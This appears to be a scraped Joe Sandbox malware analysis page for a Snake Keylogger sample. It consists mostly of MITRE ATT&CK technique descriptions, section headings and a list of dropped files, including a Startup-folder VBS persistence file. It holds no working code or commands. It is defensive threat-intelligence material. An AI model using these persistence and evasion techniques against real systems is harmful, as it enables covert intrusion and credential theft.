Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MBOaS3GRtF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Anglophile\supergroup.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\aut5438.tmp

C:\Users\user\AppData\Local\Temp\aut5D60.tmp

C:\Users\user\AppData\Local\Temp\autA14E.tmp

C:\Users\user\AppData\Local\Temp\preconform

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
MBOaS3GRtF.exe

Function 00AA3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00AA49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre